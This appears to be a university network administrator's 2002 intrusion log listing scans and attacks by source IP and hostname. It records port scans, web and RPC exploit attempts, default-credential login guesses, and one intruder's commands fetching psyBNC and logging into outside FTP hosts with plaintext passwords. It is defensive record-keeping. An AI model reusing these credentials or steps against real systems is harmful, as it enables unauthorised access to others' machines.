217.208.61.101 (h101n2fls32o883.telia.com) scannet for port 21 2002/04/23-06:02:06.38 65.94.248.2 (MTL-HSE-ppp206812.qc.sympatico.ca) scannet for port 21 2002/04/23-07:06:11.20 209.78.78.206 (dialup206.lemoorenet.com) scannet for port 21 2002/04/23-07:33:58.29 136.176.194.89 (IRT-178-276.bradley.edu) scannet for port 21 2002/04/23-07:39:08.17 136.176.194.89 (IRT-178-276.bradley.edu) scannet for port 21 2002/04/23-09:15:41.23 202.103.134.119 (CHINANET Guangdong province network,CN) scannet for port 22 2002/04/23-09:52:03.35 217.131.120.133 (SUPERONLINE-AS,Istanbul,Turkey) scannet for port 80,NETBIOS SMB C access 2002/04/23-12:04:52.05 80.116.104.244 (Telecom Italia,IT) scannet for port 21 2002/04/23-12:51:50.47 65.101.181.185 (reater Tucson Econimic Council,AZ,US) scannet for port 6112 2002/04/23-13:08:13.02 202.29.9.9 (Rachabhat Institute Nakhon Pathom,TH) scannet for port 80 2002/04/23-13:17:32.28 213.64.164.59 (h59n1c1o1023.bredband.skanova.com) scannet for port 137,139,80,445 2002/04/23-16:36:44.07 64.228.107.87 (Toronto-ppp221524.sympatico.ca) scannet for port 135 2002/04/23-16:37:22.01 216.208.158.208 (A3-P207.RipNET.com) scannet for port 135 2002/04/23-16:37:24.03 195.175.237.171 (Provider Local Registry,TR) scannet for port 135 2002/04/23-16:37:31.43 216.209.145.65 (Guelph-ppp3522528.sympatico.ca) scannet for port 135 2002/04/23-16:39:00.06 128.134.142.64 (Korea crap) scannet for port 135 2002/04/23-16:39:21.09 68.0.195.157 (ip68-0-195-157.ri.ri.cox.net) scannet for port 135 2002/04/23-19:16:53.86 65.198.68.56 (netmapper.research.lumeta.com) ping scan of several ips on net 2002/04/23-19:42:49.59 202.103.134.119 (CHINANET Guangdong province network,CN) scannet for port 22 2002/04/23-20:09:52.87 140.112.17.106 (donald.ee.ntu.edu.tw) scannet for port 80, sadmind worm attack 2002/04/23-21:30:50.11 65.221.79.23 (frognet.com, Athens,OH,US) scannet for port 80 2002/04/23-21:46:28.47 61.56.228.157 (New Centry InfoComm Tech. Co., Ltd,TAIPEI,TW) scannet for port 21 2002/04/23-22:47:11.74 24.95.74.58 (dhcp9574058.columbus.rr.com) scannet for port 80 2002/04/24-07:55:04.43 212.185.253.140 (cw08.D1.srv.t-online.de) scannet port 80, whisker space splice attack on ips w/out servers. 2002/04/24-07:55:45.42 212.185.253.129 (cw01.D1.srv.t-online.de) scannet port 80, whisker space splice attack on ips w/out servers. 2002/04/24-07:56:31.61 212.185.253.138 (cw06.D1.srv.t-online.de) scannet port 80, whisker space splice attack on ips w/out servers. 2002/04/24-07:56:42.62 212.185.253.139 (cw07.D1.srv.t-online.de) scannet port 80, whisker space splice attack on ips w/out servers. 2002/04/24-08:55:04.08 65.117.102.111:1346 (WATERFORD INSTITUTE) scannet for netbios-name-query 2002/04/24-09:24:52.757310 202.103.134.119 (CHINANET Guangdong province network,CN) scannet port 22 2002/04/24-10:44:19.73 80.130.127.193 (p50827FC1.dip.t-dialin.net) scannet fo rport 80 2002/04/24-11:01:20.816647 202.57.85.12 (adsl-57.85.12.info.com.ph) scannnet NETBIOS SMB C access 2002/04/24-13:19:15.50 132.235.94.25 (OUCOM -ohiou.edu) scannet for port 41524 2002/04/24-13:28:02.40 65.198.68.56 (netmapper.research.lumeta.com) scannet port 33435 2002/04/24-16:05:34.93 211.43.165.212 (korea crap) scannet for port 111, buff overflow attack 2002/04/24-17:06:51.42 132.235.165.234:4680 (dhcp-165-234.east-green.ohiou.edu) scannet for netbios-name-query 2002/04/25-05:39:41.408870 65.221.79.23 (Frognet, Athens, Oh, US) scannet for port 80 2002/04/25-07:42:51.42 212.185.253.131 (cw03.D1.srv.t-online.de) scannet for port 80 w/whisker space splice attack 2002/04/25-07:43:10.89 212.185.253.129 (cw01.D1.srv.t-online.de) scannet for port 80 w/whisker space splice attack 2002/04/25-07:43:20.72 212.185.253.140 (cw08.D1.srv.t-online.de) scannet for port 80 w/whisker space splice attack 2002/04/25-07:43:21.14 212.185.253.138 (cw06.D1.srv.t-online.de) scannet for port 80 w/whisker space splice attack 2002/04/25-07:44:15.26 212.185.253.139 (cw07.D1.srv.t-online.de) scannet for port 80 w/whisker space splice attack 2002/04/25-09:13:23.00 132.235.178.107:137 (dhcp-178-107.south-green.ohiou.edu) scannet for netbios-name-query 2002/04/25-11:59:43.68 202.54.39.172 (LEASED LINE CUSTOMER AT BANGALORE-VXL INSTRUMENTS,IN) scannet for port 21 2002/04/25-14:11:46.51 64.51.31.19 (64-51-31-19.client.dsl.net) scannet for port 21 2002/04/25-18:25:17.16 128.230.227.181 (syru227-181.syr.edu) scan several ips for port 3072,1024 2002/04/25-19:50:43.47 217.230.130.120 (pD9E68278.dip.t-dialin.net) scannet with ping 2002/04/26-01:19:17.93 132.235.166.227 (dhcp-166-227.east-green.ohiou.edu) 1. login p1 as root/too, admin/adm,sys/sys, deadmon/daemon 2002/04/26-01:19:17.93 132.235.166.227 (dhcp-166-227.east-green.ohiou.edu) 2. etc.., plus KIRKPATRICK and NPERNAL 2002/04/26-04:30:07.65 203.62.163.68 (pm58.rock.accessin.com.au) scannet port 139, NETBIOS SMB C access 2002/04/26-06:36:04.89 217.120.90.116 (cp8722-b.dbsch1.nb.nl.home.com) scannet for port 445 2002/04/26-06:36:08.09 217.120.90.116 (cp8722-b.dbsch1.nb.nl.home.com) scannet for port 445 2002/04/26-09:21:36.54 62.212.119.141 (aboukir-102-1-30-141.adsl.nerim.net) scannet for port 21 2002/04/26-13:58:21.24 130.102.19.130 (vcporter.executive.uq.edu.au) scannet for port 445 2002/04/26-15:26:57.75 166.104.50.42 (oniom.hanyang.ac.kr) scannet for port 21 2002/04/26-22:23:36.75 200.60.77.82 (FUNDACION DE LIBRO,LIMA,PE) scannet for port 6112 2002/04/26-23:27:18.35 202.145.75.189 (FIC Network Service, INC.,TAIPEI,TW) scannet for port 111,statdx exploit attack 2002/04/27-06:03:50.18 144.138.93.185 (Telstra,canberra, au) scannet for port 27374 2002/04/27-06:08:39.00 161.116.7.147 (Universitat de Barcelona,ES) scannet for port 80 2002/04/27-08:08:25.72 212.120.85.61 (cp117156-a.dbsch1.nb.nl.home.com) scannet for port 80 2002/04/27-17:35:40.55 199.243.123.220 (BEX Engineering Ltd, Ontario,CA) scannet for port 515, 132.235.4.63 ports 23,53 2002/04/27-19:58:33.60 65.93.235.106 (Quebec-HSE-ppp3623407.sympatico.ca) scannet for port 21 2002/04/28-06:13:02.35 208.33.22.151 (UNIDIAL/HPN CONSULTING,KY,US) scann for port 515 2002/04/28-10:55:14.78 210.176.204.166 (mail.luenshing.com.hk) scannet for port 21 2002/04/28-11:21:18.65 65.93.235.106 (Quebec-HSE-ppp3623407.sympatico.ca) scannet fo rport 21 2002/04/28-14:13:33.00 203.79.64.167 (203-79-64-167.adsl.paradise.net.nz) scannet for port 80 2002/04/28-19:20:05.46 216.244.176.131 (Red Privada Empresarial SA,LIMA,PE) scannet for port 21 2002/04/28-19:52:56.73 163.26.92.129 (Tainan Education Network,TW) scannet for port 21 2002/04/28-20:24:58.27 210.223.80.207 (SENHO MEDICHINE,SEOUL,KR) scannet for port 21 2002/04/28-20:48:43.94 145.254.65.215 (dialin-145-254-065-215.arcor-ip.net) scannet for port 111 2002/04/28-21:09:15.02 80.136.20.223 (p508814DF.dip.t-dialin.net) scannet for port 80 2002/04/29-00:23:04.78 80.129.90.253 (p50815AFD.dip.t-dialin.net) scannet for port 21 2002/04/29-05:05:33.82 12.233.26.105 (12-233-26-105.client.attbi.com) scannet for port 445 2002/04/29-09:59:03.22 65.93.230.35 (Quebec-HSE-ppp3622066.sympatico.ca) scannet for port 21 2002/04/29-13:11:26.91 132.235.197.15 (havoc.cns.ohiou.edu) ping scan of net 2002/04/29-14:13:49.31 212.185.253.131 (cw03.D1.srv.t-online.de) whisker space splice attack - port 80 against 6 ips on net 2002/04/29-14:13:51.32 212.185.253.139 (cw07.D1.srv.t-online.de) whisker space splice attack - port 80 against 8 ips on net 2002/04/29-14:13:59.65 212.185.253.137 (cw05.D1.srv.t-online.de) whisker space splice attack - port 80 against 16 ips on net 2002/04/29-14:14:20.02 212.185.253.138 (cw06.D1.srv.t-online.de) whisker space splice attack - port 80 against 11 ips on net 2002/04/29-14:14:38.63 212.185.253.132 (cw04.D1.srv.t-online.de) whisker space splice attack - port 80 against 3 ips on net 2002/04/29-14:15:31.62 212.185.253.140 (cw08.D1.srv.t-online.de) whisker space splice attack - port 80 against 9 ips on net 2002/04/29-19:55:29.53 212.187.18.23 ( 23.18.187.212.IN-ADDR.ARPA domain name pointer c18023.upc-c.chello.nl) scannet for port 80 2002/04/29-20:51:14.89 200.206.159.15 (200-206-159-15.dsl.telesp.net.br) scannet for port 21 2002/04/29-22:19:30.44 163.180.116.111 (ica.kyunghee.ac.kr) scannet for port 21 2002/04/29-22:30:47.87 65.93.235.254 (Quebec-HSE-ppp3623555.sympatico.ca) scannet for port 21 2002/04/29-22:53:08.81 65.93.101.185 (Kitchener-HSE-ppp3565066.sympatico.ca) scannet for port 139 - NETBIOS SMB C access 2002/04/30-00:30:12.44 203.106.165.166 (TMnet Telekom Malaysia,MY) 1. scannet for ports 79,161,1524,ping nd fingering 123@machine 2002/04/30-00:30:12.44 203.106.165.166 (TMnet Telekom Malaysia,MY) 2. try to login 132.235.4.63 as quota150/quota150 2002/04/30-01:37:33.94 150.164.76.110 (ftp.cecom.ufmg.br) scannet for port 21 2002/04/30-01:38:56.98 203.106.165.166 (TMnet Telekom Malaysia) 1. finger 123@moose, login using passwd=userid. Try to get psybnc by: 2002/04/30-01:38:56.98 203.106.165.166 (TMnet Telekom Malaysia) 2. lynx http:///www.psychoid.lam3rz.de/psyBNC2.2.2 2002/04/30-01:38:56.98 203.106.165.166 (TMnet Telekom Malaysia) 3. ftp 210.115.58.137 user jasung pass kiild00d 2002/04/30-01:38:56.98 203.106.165.166 (TMnet Telekom Malaysia) 4. ftp shell.tracenetwork.net user dramkid pass d00msday.2002 2002/04/30-04:18:39.00 61.147.48.4 (CHINANET Jiangsu province network,CN) some moron using 132.235.1.70 as dns sever 2002/04/30-05:58:31.73 212.187.18.23 (c18023.upc-c.chello.nl) 1. HAMMER stocker center w/ 153067 connects to 121 ips port 80. 2002/04/30-05:58:31.73 212.187.18.23 (c18023.upc-c.chello.nl) 2. setup ftp server by getting script/programs from 2002/04/30-05:58:31.73 212.187.18.23 (c18023.upc-c.chello.nl) 3. 212.187.18.23 use/pass = blaat/blaat. 2002/04/30-10:16:40.16 132.235.46.250 (dhcp-046-250.cns.ohiou.edu) scannet for port 161, port 21 on selected ips 2002/04/30-10:40:33.08 212.185.253.[129-140] (*..D1.srv.t-online.de) whisker space splice attacks 2002/04/30-11:24:53.08 217.125.54.27 (217-125-54-27.uc.nombres.ttd.es) scannet for port 21, anon ftp attacks 2002/04/30-12:32:35.00 132.235.28.143 (dhcp-028-143.cns.ohiou.edu) scan 132.235.19.*:139 2002/04/30-12:48:18.82 132.235.144.195 (dhcp-144-195.cns.ohiou.edu) scannet for port 524 2002/04/30-13:57:41.12 62.123.0.253 (ppp-62-123-0-253.dial.ipervia.it) scannet for port 23, some ips port 111 - rpc port list 2002/04/30-14:17:29.78 212.185.253.129 (cw01.D1.srv.t-online.de) whisker space splice attack - port 80 against 8 ips on net 2002/04/30-18:41:34.52 64.230.102.227 (Ottawa-HSE-ppp244016.sympatico.ca) scan 9 ips for ICMP Address Mask Request,timestamp req. 2002/04/30-23:15:00.75 210.248.126.199 (Ideasland Incorporated,JP) scannet for port 6112 + buff overflow attacks - cde dtspcd